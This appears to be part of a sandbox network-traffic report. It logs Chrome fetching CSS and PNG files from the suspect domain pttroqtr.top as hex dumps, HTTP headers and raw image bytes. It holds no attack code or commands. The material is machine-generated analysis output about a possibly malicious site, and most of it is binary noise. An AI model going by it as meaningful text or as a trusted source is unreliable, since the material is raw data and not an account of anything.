                                                                                                                                                                                            2024-09-28 03:39:38 UTC6884INData Raw: 3a 72 6f 6f 74 7b 2d 2d 62 67 43 6f 6c 6f 72 3a 23 66 31 66 31 66 31 3b 2d 2d 70 74 74 47 72 65 65 6e 43 6f 6c 6f 72 3a 23 30 30 61 39 63 65 3b 2d 2d 70 74 74 59 65 6c 6c 6f 77 43 6f 6c 6f 72 3a 23 66 66 63 37 32 63 3b 2d 2d 70 74 74 4c 69 6e 6b 43 6f 6c 6f 72 3a 23 35 33 35 36 35 61 3b 2d 2d 70 72 69 6d 61 72 79 42 67 43 6f 6c 6f 72 3a 23 35 30 61 35 66 66 3b 2d 2d 64 61 72 6b 50 72 69 6d 61 72 79 42 67 43 6f 6c 6f 72 3a 23 30 30 37 63 66 66 3b 2d 2d 73 65 63 6f 6e 64 61 72 79 42 67 43 6f 6c 6f 72 3a 23 38 35 38 35 38 35 3b 2d 2d 64 61 72 6b 53 65 63 6f 6e 64 61 72 79 42 67 43 6f 6c 6f 72 3a 23 36 35 36 35 36 35 3b 2d 2d 73 75 63 63 65 73 73 42 67 43 6f 6c 6f 72 3a 23 33 30 63 37 38 31 3b 2d 2d 64 61 72 6b 53 75 63 63 65 73 73 42 67 43 6f 6c 6f 72 3a 23
                                                                                                                                                                                            Data Ascii: :root{--bgColor:#f1f1f1;--pttGreenColor:#00a9ce;--pttYellowColor:#ffc72c;--pttLinkColor:#53565a;--primaryBgColor:#50a5ff;--darkPrimaryBgColor:#007cff;--secondaryBgColor:#858585;--darkSecondaryBgColor:#656565;--successBgColor:#30c781;--darkSuccessBgColor:#
                                                                                                                                                                                            2024-09-28 03:39:38 UTC7271INData Raw: 61 62 6c 65 2d 72 65 73 70 6f 6e 73 69 76 65 2d 73 6d 3e 2e 74 61 62 6c 65 2d 62 6f 72 64 65 72 65 64 7b 62 6f 72 64 65 72 3a 30 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 36 37 2e 39 38 70 78 29 7b 2e 74 61 62 6c 65 2d 72 65 73 70 6f 6e 73 69 76 65 2d 6d 64 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 31 30 30 25 3b 6f 76 65 72 66 6c 6f 77 2d 78 3a 61 75 74 6f 3b 2d 77 65 62 6b 69 74 2d 6f 76 65 72 66 6c 6f 77 2d 73 63 72 6f 6c 6c 69 6e 67 3a 74 6f 75 63 68 7d 2e 74 61 62 6c 65 2d 72 65 73 70 6f 6e 73 69 76 65 2d 6d 64 3e 2e 74 61 62 6c 65 2d 62 6f 72 64 65 72 65 64 7b 62 6f 72 64 65 72 3a 30 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 39 39 31 2e 39 38 70 78 29 7b 2e 74 61 62 6c 65 2d 72 65 73 70 6f
                                                                                                                                                                                            Data Ascii: able-responsive-sm>.table-bordered{border:0}}@media (max-width:767.98px){.table-responsive-md{display:block;width:100%;overflow-x:auto;-webkit-overflow-scrolling:touch}.table-responsive-md>.table-bordered{border:0}}@media (max-width:991.98px){.table-respo
                                                                                                                                                                                            2024-09-28 03:39:39 UTC7271INData Raw: 74 68 3a 32 72 65 6d 3b 68 65 69 67 68 74 3a 32 72 65 6d 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 76 61 72 28 2d 2d 66 6f 6e 74 57 65 69 67 68 74 29 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 72 65 6d 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 6d 6f 64 61 6c 3e 2e 6d 6f 64 61 6c 2d 63 6f 6e 74 65 6e 74 3e 2e 6d 6f 64 61 6c 2d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 31 72 65 6d 20 32 72 65 6d 7d 2e 6d 6f 64 61 6c 3e 2e 6d 6f 64 61 6c 2d 63 6f 6e 74 65 6e 74 3e 2e 6d 6f 64 61 6c 2d 66 6f 6f 74 65 72 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 77 72 61
                                                                                                                                                                                            Data Ascii: th:2rem;height:2rem;border-radius:50%;color:#fff;font-size:1.2rem;font-weight:var(--fontWeight);text-align:center;line-height:2rem;cursor:pointer}.modal>.modal-content>.modal-body{padding:1rem 2rem}.modal>.modal-content>.modal-footer{display:flex;flex-wra
                                                                                                                                                                                            2024-09-28 03:39:39 UTC7271INData Raw: 6d 61 72 6b 2d 73 69 7a 65 29 20 2f 20 32 2e 36 29 3b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 30 20 63 61 6c 63 28 76 61 72 28 2d 2d 63 6b 2d 74 6f 64 6f 2d 6c 69 73 74 2d 63 68 65 63 6b 6d 61 72 6b 2d 73 69 7a 65 29 20 2f 20 38 29 20 63 61 6c 63 28 76 61 72 28 2d 2d 63 6b 2d 74 6f 64 6f 2d 6c 69 73 74 2d 63 68 65 63 6b 6d 61 72 6b 2d 73 69 7a 65 29 20 2f 20 38 29 20 30 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 34 35 64 65 67 29 7d 2e 63 6b 2d 65 64 69 74 6f 72 5f 5f 65 64 69 74 61 62 6c 65 2e 63 6b 2d 63 6f 6e 74 65 6e 74 20 2e 74 6f 64 6f 2d 6c 69 73 74 20 2e 74 6f 64 6f 2d 6c 69 73 74 5f 5f 6c 61 62 65 6c 3e 73
                                                                                                                                                                                            Data Ascii: mark-size) / 2.6);border-style:solid;border-color:transparent;border-width:0 calc(var(--ck-todo-list-checkmark-size) / 8) calc(var(--ck-todo-list-checkmark-size) / 8) 0;transform:rotate(45deg)}.ck-editor__editable.ck-content .todo-list .todo-list__label>s
                                                                                                                                                                                            2024-09-28 03:39:39 UTC7271INData Raw: 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 32 38 2c 2e 38 34 2c 2e 34 32 2c 31 29 29 7d 2e 66 61 2d 66 61 64 65 7b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 66 61 64 65 3b 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 76 61 72 28
                                                                                                                                                                                            Data Ascii: --fa-animation-iteration-count,infinite);animation-timing-function:var(--fa-animation-timing,cubic-bezier(.28,.84,.42,1))}.fa-fade{animation-name:fa-fade;animation-iteration-count:var(--fa-animation-iteration-count,infinite);animation-timing-function:var(
                                                                                                                                                                                            2024-09-28 03:39:39 UTC7271INData Raw: 2c 2e 66 61 2d 73 70 61 67 68 65 74 74 69 2d 6d 6f 6e 73 74 65 72 2d 66 6c 79 69 6e 67 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 36 37 62 22 7d 2e 66 61 2d 61 72 72 6f 77 2d 64 6f 77 6e 2d 75 70 2d 61 63 72 6f 73 73 2d 6c 69 6e 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 34 61 66 22 7d 2e 66 61 2d 73 70 6f 6f 6e 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 75 74 65 6e 73 69 6c 2d 73 70 6f 6f 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 65 35 22 7d 2e 66 61 2d 6a 61 72 2d 77 68 65 61 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 35 31 37 22 7d 2e 66 61 2d 65 6e 76 65 6c 6f 70 65 73 2d 62 75 6c 6b 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 6d 61 69 6c 2d 62 75 6c 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74
                                                                                                                                                                                            Data Ascii: ,.fa-spaghetti-monster-flying:before{content:"\f67b"}.fa-arrow-down-up-across-line:before{content:"\e4af"}.fa-spoon:before,.fa-utensil-spoon:before{content:"\f2e5"}.fa-jar-wheat:before{content:"\e517"}.fa-envelopes-bulk:before,.fa-mail-bulk:before{content
                                                                                                                                                                                            2024-09-28 03:39:39 UTC7271INData Raw: 3a 22 5c 66 32 35 36 22 7d 2e 66 61 2d 6f 6d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 36 37 39 22 7d 2e 66 61 2d 77 6f 72 6d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 35 39 39 22 7d 2e 66 61 2d 68 6f 75 73 65 2d 63 69 72 63 6c 65 2d 78 6d 61 72 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 35 30 62 22 7d 2e 66 61 2d 70 6c 75 67 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 65 36 22 7d 2e 66 61 2d 63 68 65 76 72 6f 6e 2d 75 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 37 22 7d 2e 66 61 2d 68 61 6e 64 2d 73 70 6f 63 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 35 39 22 7d 2e 66 61 2d 73 74 6f 70 77 61 74 63 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22
                                                                                                                                                                                            Data Ascii: :"\f256"}.fa-om:before{content:"\f679"}.fa-worm:before{content:"\e599"}.fa-house-circle-xmark:before{content:"\e50b"}.fa-plug:before{content:"\f1e6"}.fa-chevron-up:before{content:"\f077"}.fa-hand-spock:before{content:"\f259"}.fa-stopwatch:before{content:"
                                                                                                                                                                                            2024-09-28 03:39:39 UTC7271INData Raw: 5c 65 31 34 30 22 7d 2e 66 61 2d 68 65 61 64 73 65 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 39 30 22 7d 2e 66 61 2d 73 74 6f 72 65 2d 73 6c 61 73 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 37 31 22 7d 2e 66 61 2d 72 6f 61 64 2d 63 69 72 63 6c 65 2d 78 6d 61 72 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 35 36 36 22 7d 2e 66 61 2d 75 73 65 72 2d 6d 69 6e 75 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 30 33 22 7d 2e 66 61 2d 6d 61 72 73 2d 73 74 72 6f 6b 65 2d 75 70 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 6d 61 72 73 2d 73 74 72 6f 6b 65 2d 76 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 32 61 22 7d 2e 66 61 2d 63 68 61 6d 70 61 67 6e 65 2d 67 6c 61 73 73 65 73 3a 62 65
                                                                                                                                                                                            Data Ascii: \e140"}.fa-headset:before{content:"\f590"}.fa-store-slash:before{content:"\e071"}.fa-road-circle-xmark:before{content:"\e566"}.fa-user-minus:before{content:"\f503"}.fa-mars-stroke-up:before,.fa-mars-stroke-v:before{content:"\f22a"}.fa-champagne-glasses:be
                                                                                                                                                                                            2024-09-28 03:39:39 UTC7271INData Raw: 6e 74 65 6e 74 3a 22 5c 66 30 37 65 22 7d 2e 66 61 2d 68 6f 75 73 65 2d 6c 6f 63 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 35 31 30 22 7d 2e 66 61 2d 63 6c 6f 75 64 2d 61 72 72 6f 77 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 63 6c 6f 75 64 2d 64 6f 77 6e 6c 6f 61 64 2d 61 6c 74 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 63 6c 6f 75 64 2d 64 6f 77 6e 6c 6f 61 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 64 22 7d 2e 66 61 2d 63 68 69 6c 64 72 65 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 34 65 31 22 7d 2e 66 61 2d 62 6c 61 63 6b 62 6f 61 72 64 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 63 68 61 6c 6b 62 6f 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 31 62 22 7d 2e 66 61 2d 75 73 65
                                                                                                                                                                                            Data Ascii: ntent:"\f07e"}.fa-house-lock:before{content:"\e510"}.fa-cloud-arrow-down:before,.fa-cloud-download-alt:before,.fa-cloud-download:before{content:"\f0ed"}.fa-children:before{content:"\e4e1"}.fa-blackboard:before,.fa-chalkboard:before{content:"\f51b"}.fa-use
                                                                                                                                                                                            2024-09-28 03:39:39 UTC7271INData Raw: 61 2d 70 6c 61 6e 65 2d 64 65 70 61 72 74 75 72 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 62 30 22 7d 2e 66 61 2d 68 61 6e 64 73 68 61 6b 65 2d 73 6c 61 73 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 36 30 22 7d 2e 66 61 2d 62 6f 6f 6b 2d 62 6f 6f 6b 6d 61 72 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 62 62 22 7d 2e 66 61 2d 63 6f 64 65 2d 62 72 61 6e 63 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 32 36 22 7d 2e 66 61 2d 68 61 74 2d 63 6f 77 62 6f 79 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 38 63 30 22 7d 2e 66 61 2d 62 72 69 64 67 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 34 63 38 22 7d 2e 66 61 2d 70 68 6f 6e 65 2d 61 6c 74 3a 62 65 66 6f 72
                                                                                                                                                                                            Data Ascii: a-plane-departure:before{content:"\f5b0"}.fa-handshake-slash:before{content:"\e060"}.fa-book-bookmark:before{content:"\e0bb"}.fa-code-branch:before{content:"\f126"}.fa-hat-cowboy:before{content:"\f8c0"}.fa-bridge:before{content:"\e4c8"}.fa-phone-alt:befor


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            110192.168.2.5498378.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:38 UTC599OUTGET /help/layout/images/53.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:38 UTC312INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:38 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 68155
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"10a3b-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:38 UTC16072INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 01 09 c8 49 44 41 54 78 da ec 9d 07 80 14 e5 d9 c7 9f 77 66 eb f5 e3 38 38 40 8a 14 1b 16 9a 15 63 c5 8a d8 7b fd 6c 88 dd a8 51 a3 18 4d 62 4c 34 cd 98 68 2c 31 2a 2a b6 28 16 ec 1a 13 2b 2a 08 08 0a 48 87 a3 1c 70 c7 f5 db db 9d 79 df ef ad 33 ef ec 1d 2a 24 c4 c2 f3 4b d6 6d b3 b3 b3 b3 b3 37 7f fe 4f 23 8c 31 40 10 04 41 10 04 41 be 5f 38 b8 0b 10 04 41 10 04 41 50 c4 21 08 82 20 08 82 20 28 e2 10 04 41 10 04 41 10 14 71 08 82 20 08 82 20 28 e2 10 04 41 10 04 41 10 14 71 08 82 20
                                                                                                                                                                                            Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<IDATxwf88@c{lQMbL4h,1**(+*Hpy3*$Km7O#1@AA_8AAP! (AAq (AAq
                                                                                                                                                                                            2024-09-28 03:39:38 UTC16384INData Raw: 30 b4 be f7 6f 7b 5c 97 54 7d 57 fd e4 da e3 fb f5 e9 33 e8 81 09 13 0a f1 cf 20 82 20 08 8a b8 ef 05 27 9c 78 a2 48 12 3a 9c 84 89 46 f0 ec e4 37 61 e6 cc 39 e0 26 12 50 dc 67 7b a0 a2 12 d3 d1 ad 63 1d ad 9d 40 b9 42 54 38 47 f2 e4 ed 80 ca eb 57 d5 99 a2 82 55 06 3a b9 a8 72 fb 6e 0b 7d 4f b9 50 b5 79 e0 27 d8 b5 5c c8 65 b3 ad 5c 98 a4 20 16 17 e3 bb 52 c0 b8 98 a3 5c d8 c9 6a 57 d1 96 44 3b 79 42 c4 f9 5c e4 b5 27 92 f0 c0 be a7 c2 e2 5e 7d a4 20 68 99 bf 14 6a df 9d a2 26 1f 80 5d ed 18 86 e7 c4 c9 bc 69 ce 97 b0 fa d5 f7 a0 79 c9 2a 20 a9 04 24 87 0f 82 6e d7 5f 08 fd 5f 9e 04 dd 7f 71 0b 7f 2c d5 51 60 fd 2f d0 22 a2 f5 dd b7 60 d5 59 27 42 d3 df 9f d2 9a 89 41 ae ad 09 72 f5 eb c1 6b 6e 95 ed 55 88 9c da e0 f0 ef 23 09 31 be bd 6e 32 16 c8 68 f5
                                                                                                                                                                                            Data Ascii: 0o{\T}W3 'xH:F7a9&Pg{c@BT8GWU:rn}OPy'\e\ R\jWD;yB\'^} hj&]iy* $n__q,Q`/"`Y'BArknU#1n2h
                                                                                                                                                                                            2024-09-28 03:39:39 UTC16384INData Raw: 2e 81 27 5e de 9d f2 2f eb 76 d8 3e 3e b1 ef ad c4 b1 66 f6 46 52 9e 67 96 19 52 f3 a6 8c 76 cd bc 18 f9 22 03 7d 03 66 13 3d 6d 8f 9b 3d 2e 5b 47 35 81 ef 01 4a 35 fd 77 8c bb b6 30 a5 e6 b5 bd 75 1c 33 7f 26 e2 ca 9d 21 64 96 8b c5 a8 ce ac 96 a0 43 23 c8 50 d8 2a 54 b5 ad 08 47 91 68 de 56 c4 1b 12 07 88 ce 46 6c 91 34 78 45 ef 63 1d 52 1d da 1e 7b d6 13 23 42 05 98 53 a1 f4 01 bc c2 0e 24 b8 8c 7d 88 3f 4f f0 d7 35 1e df aa af c1 88 42 e9 b2 cb 02 90 68 cf 0f ef 08 05 c5 1f 1c 23 13 18 b0 ab d3 bc 72 d5 aa 82 d8 5b 09 e4 72 d0 ab 76 cd a9 fd f5 3d d9 31 1b 0c 7d 83 d1 25 73 d0 8d f7 d9 b1 ec 8b 93 63 a6 98 cf 69 ff 1e d3 e3 75 21 74 1f 2d 75 34 73 3f 67 4b 84 d9 fc 65 20 2e 18 7f 73 db 6d 7c c7 b6 6d 3b 19 e3 35 fc 7c b1 90 d3 0b 9d 00 4d 1d 2d f6 3b
                                                                                                                                                                                            Data Ascii: .'^/v>>fFRgRv"}f=m=.[G5J5w0u3&!dC#P*TGhVFl4xEcR{#BS$}?O5Bh#r[rv=1}%sciu!t-u4s?gKe .sm|m;5|M-;
                                                                                                                                                                                            2024-09-28 03:39:39 UTC16384INData Raw: 02 4c eb 39 d6 46 bc 56 41 ab 99 37 9c dc 00 61 5f 9c 63 df a8 7f 2d 78 1e 42 8f 3c 92 2a a3 5a 1b 11 ce 4d 99 d5 24 63 28 26 0e 99 ff fa bd 07 d2 37 04 a4 5c 80 da 23 9b db 58 b8 dc 89 2b a0 7c e9 eb 1d 86 93 5b ff e1 5d 77 8e bc f4 e2 8b db c5 e5 fc a2 78 6e ef 67 36 6d 4a b2 df 14 d9 c8 46 36 b2 31 bb 06 cd a6 00 e0 7f 6e ba 4d f6 fa 54 6e fd f3 5b 3f 8f d6 37 7e ee 79 e7 c2 c6 8d e7 43 b3 d9 f0 25 33 6e d9 0b ab 2a e5 81 19 b0 ea 84 63 9e 4c b3 06 be 92 e9 62 ce 4e 84 b9 cf bb 3e 38 fb bc d4 57 d8 e7 98 ed 95 33 29 10 d4 a7 13 94 ca 45 88 f3 91 d8 b7 16 d4 ea 75 68 34 9b 46 a5 1a eb de b8 c8 28 55 23 9b e2 a0 05 10 43 e5 e7 e1 dc 13 7e 07 06 4b f7 00 49 88 f6 10 63 86 c9 32 f7 c0 72 02 cb dd 03 b5 1d 1f 80 a4 f1 b4 e7 67 a6 7b a4 d9 32 09 3e 0b 05 65
                                                                                                                                                                                            Data Ascii: L9FVA7a_c-xB<*ZM$c(&7\#X+|[]wxng6mJF61nMTn[?7~yC%3n*cLbN>8W3)Euh4F(U#C~KIc2rg{2>e
                                                                                                                                                                                            2024-09-28 03:39:39 UTC2931INData Raw: 9b 77 ff f2 57 bf da d6 b6 ac 6d f7 40 21 bf 57 09 38 79 86 e5 46 c8 89 3d b3 67 ce e8 45 eb 14 00 00 00 44 1c f8 93 49 e7 72 4a fd d4 cb ad d9 a6 3e 1c 99 49 a5 a6 7e e1 aa cf bd f5 73 5f f8 fc ac 20 08 b8 b5 fe f5 da ac ae ac 56 a6 72 fe 09 2a f7 dc 42 51 a9 cd e4 5c f1 8c 14 41 81 16 68 bc 22 b7 81 90 58 c1 e4 95 9a 88 2f b3 8e 4e 9f 90 85 36 a5 c1 af ca 29 78 32 bd ca ac e1 af 1e b0 88 28 aa 1f 2a b7 09 52 40 35 50 b6 fe 8b 6a e4 53 8b 36 ae 9e 57 55 e2 28 4b 3c 18 41 fe a8 ab 28 95 a8 bc e8 25 62 99 0c 0d dc 7c 3b 51 5f de cc 5f 64 5d b0 7d 60 ae 93 09 9e 27 b9 1f af ad a5 e0 a8 19 94 3a 6a 26 51 5d 83 3c 36 4b 22 8c 8c 78 53 55 bb 6c 9a 82 91 c3 cd f1 83 d4 ae 7b 77 54 fb 74 ed da 35 07 2e ba f8 e2 55 2f 2d 5e bc 5d 3e 65 97 12 6d 91 a9 be 6d 96 cf
                                                                                                                                                                                            Data Ascii: wWm@!W8yF=gEDIrJ>I~s_ Vr*BQ\Ah"X/N6)x2(*R@5PjS6WU(K<A(%b|;Q__d]}`':j&Q]<6K"xSUl{wTt5.U/-^]>emm


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            111192.168.2.5498388.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:38 UTC599OUTGET /help/layout/images/54.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:39 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:38 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 62332
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"f37c-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:39 UTC16073INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 f3 09 49 44 41 54 78 da ec 7d 07 98 5b c5 d5 f6 51 97 56 5a 69 7b ef 5e af 7b c7 15 57 6c aa e9 10 20 a1 27 24 21 05 02 04 7e c2 47 42 49 e0 4b a3 a5 00 5f 1a 21 09 bd 84 de 12 c0 06 8c b1 8d 8d 0b d8 06 b7 ed bd 57 75 e9 9f 33 77 46 ba 2b ef 7a b5 5e 6d f1 fa bc cf 23 6b 35 be ba f7 6a e6 dc 99 77 4e d5 04 83 41 20 10 08 04 02 81 40 20 1c 5b d0 52 17 10 08 04 02 81 40 20 10 89 23 10 08 04 02 81 40 20 10 89 23 10 08 04 02 81 40 20 10 89 23 10 08 04 02 81 40 20 12 47 20 10 08 04 02
                                                                                                                                                                                            Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<IDATx}[QVZi{^{Wl '$!~GBIK_!Wu3wF+z^m#k5jwNA @ [R@ #@ #@ #@ G
